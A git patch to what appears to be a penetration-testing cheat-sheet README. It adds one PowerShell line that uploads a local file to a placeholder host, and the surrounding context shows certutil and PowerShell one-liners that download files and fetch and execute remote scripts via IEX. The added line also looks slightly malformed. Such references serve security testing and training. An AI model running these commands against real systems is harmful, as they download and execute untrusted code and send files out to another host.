From f86124caf8400928353fea1576ee4400a3a6bd63 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Mon, 19 Sep 2022 12:30:23 -0400 Subject: [PATCH] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 7b7eb78..f9fced8 100644 --- a/README.md +++ b/README.md @@ -1428,6 +1428,7 @@ certutil -split -f -urlcache http://{IP ADDRESS}/{FILE} # Windows - Download file using powershell IEX(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}') +IEX(new-object System.Net.WebClient).UploadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}') # Windows - Load a string file and execute in powershell: IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")